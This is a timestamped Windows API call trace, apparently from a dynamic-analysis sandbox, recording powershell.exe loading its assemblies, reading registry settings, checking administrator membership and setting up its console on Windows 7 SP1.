	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc944c, puLen=0xcda90) returned 1
	[0635.935] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.935] CoTaskMemAlloc (cb=0x20) returned 0x28de20
	[0635.935] lstrcpyW (in: lpString1=0x28de20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.935] CoTaskMemFree (pv=0x28de20) 
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc90f4, puLen=0xcda90) returned 1
	[0635.935] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0635.935] CoTaskMemAlloc (cb=0x66) returned 0x292b80
	[0635.935] lstrcpyW (in: lpString1=0x292b80, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0635.935] CoTaskMemFree (pv=0x292b80) 
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x0, puLen=0xcda90) returned 0
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x0, puLen=0xcda90) returned 0
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x0, puLen=0xcda90) returned 0
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcda68, puLen=0xcda60 | out: lplpBuffer=0xcda68*=0x2cc909c, puLen=0xcda60) returned 1
	[0635.935] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0635.936] VerLanguageNameW (in: wLang=0x0, szLang=0x22e660, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0635.936] CoTaskMemFree (pv=0x22e660) 
	[0635.936] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\", lplpBuffer=0xcdab8, puLen=0xcdab0 | out: lplpBuffer=0xcdab8*=0x2cc9028, puLen=0xcdab0) returned 1
	[0635.945] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0635.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.945] CoTaskMemFree (pv=0x1f3620) 
	[0635.950] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0635.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.951] CoTaskMemFree (pv=0x1f3620) 
	[0635.957] lstrlenW (lpString="䅁") returned 1
	[0635.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd988 | out: phkResult=0xcd988*=0x2f8) returned 0x0
	[0637.451] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd978 | out: phkResult=0xcd978*=0x2fc) returned 0x0
	[0637.451] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda08 | out: phkResult=0xcda08*=0x198) returned 0x0
	[0637.456] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd94c, lpData=0x0, lpcbData=0xcd948*=0x0 | out: lpType=0xcd94c*=0x1, lpData=0x0, lpcbData=0xcd948*=0x56) returned 0x0
	[0637.457] CoTaskMemAlloc (cb=0x5a) returned 0x292b10
	[0637.457] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd91c, lpData=0x292b10, lpcbData=0xcd918*=0x56 | out: lpType=0xcd91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd918*=0x56) returned 0x0
	[0637.457] CoTaskMemFree (pv=0x292b10) 
	[0637.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0639.373] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0639.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.373] CoTaskMemFree (pv=0x1f3620) 
	[0652.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0652.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0655.311] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0655.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.312] CoTaskMemFree (pv=0x1f3730) 
	[0655.313] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0655.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.313] CoTaskMemFree (pv=0x1f3730) 
	[0657.105] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0657.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.105] CoTaskMemFree (pv=0x1f3730) 
	[0657.107] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0657.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.107] CoTaskMemFree (pv=0x1f3730) 
	[0657.107] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0657.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.108] CoTaskMemFree (pv=0x1f3730) 
	[0662.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0663.670] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0663.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0663.670] CoTaskMemFree (pv=0x1f3730) 
	[0663.671] CoTaskMemAlloc (cb=0x104) returned 0x1f3730
	[0663.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0663.672] CoTaskMemFree (pv=0x1f3730) 
	[0665.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0665.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0679.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0679.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0680.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0680.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0686.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0686.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0695.612] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0695.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0695.613] CoTaskMemFree (pv=0x1f3950) 
	[0695.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0695.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0695.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0704.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0704.822] SetErrorMode (uMode=0x1) returned 0x1
	[0704.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd8e0 | out: lpFileInformation=0xcd8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0704.823] SetErrorMode (uMode=0x1) returned 0x1
	[0717.671] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0717.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.671] CoTaskMemFree (pv=0x1f3950) 
	[0717.672] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0717.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.672] CoTaskMemFree (pv=0x1f3950) 
	[0717.672] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0717.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.672] CoTaskMemFree (pv=0x1f3950) 
	[0717.675] CoCreateGuid (in: pguid=0xcdca8 | out: pguid=0xcdca8*(Data1=0xdfe4309d, Data2=0x6721, Data3=0x493a, Data4=([0]=0x8e, [1]=0x44, [2]=0x41, [3]=0x30, [4]=0xfd, [5]=0x78, [6]=0x45, [7]=0x78))) returned 0x0
	[0717.679] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0717.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.679] CoTaskMemFree (pv=0x1f3950) 
	[0717.682] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0717.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.682] CoTaskMemFree (pv=0x1f3950) 
	[0719.602] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0719.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.602] CoTaskMemFree (pv=0x1f3950) 
	[0719.626] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0719.628] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd950 | out: lpConsoleScreenBufferInfo=0xcd950) returned 1
	[0719.653] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0721.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd950 | out: lpConsoleScreenBufferInfo=0xcd950) returned 1
	[0721.239] GetVersionExW (in: lpVersionInformation=0xcd8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0721.242] GetCurrentProcess () returned 0xffffffffffffffff
	[0721.243] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd978 | out: TokenHandle=0xcd978*=0x198) returned 1
	[0721.247] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd898 | out: TokenInformation=0x0, ReturnLength=0xcd898) returned 0
	[0721.248] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1f7290
	[0721.248] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x1f7290, TokenInformationLength=0x4, ReturnLength=0xcd898 | out: TokenInformation=0x1f7290, ReturnLength=0xcd898) returned 1
	[0721.250] DuplicateTokenEx (in: hExistingToken=0x198, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd9f8 | out: phNewToken=0xcd9f8*=0x2fc) returned 1
	[0721.250] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd898 | out: TokenInformation=0x0, ReturnLength=0xcd898) returned 0
	[0721.250] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1f72c0
	[0721.250] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x1f72c0, TokenInformationLength=0x4, ReturnLength=0xcd898 | out: TokenInformation=0x1f72c0, ReturnLength=0xcd898) returned 1
	[0721.251] CheckTokenMembership (in: TokenHandle=0x2fc, SidToCheck=0x2c81578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcda08 | out: IsMember=0xcda08) returned 1
	[0721.251] CloseHandle (hObject=0x2fc) returned 1
	[0721.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.726] CoTaskMemAlloc (cb=0x804) returned 0x2864d60
	[0722.726] GetConsoleTitleW (in: lpConsoleTitle=0x2864d60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0722.727] CoTaskMemFree (pv=0x2864d60) 
	[0722.742] CoTaskMemAlloc (cb=0x804) returned 0x2865610
	[0722.742] GetConsoleTitleW (in: lpConsoleTitle=0x2865610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0722.743] CoTaskMemFree (pv=0x2865610) 
	[0722.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.745] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0722.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.358] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8
	[0724.359] CoCreateGuid (in: pguid=0xcdaf0 | out: pguid=0xcdaf0*(Data1=0xeaf40010, Data2=0xc36c, Data3=0x4a2c, Data4=([0]=0x93, [1]=0xdb, [2]=0xf7, [3]=0xf2, [4]=0x7, [5]=0x8, [6]=0x64, [7]=0x19))) returned 0x0
	[0724.361] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
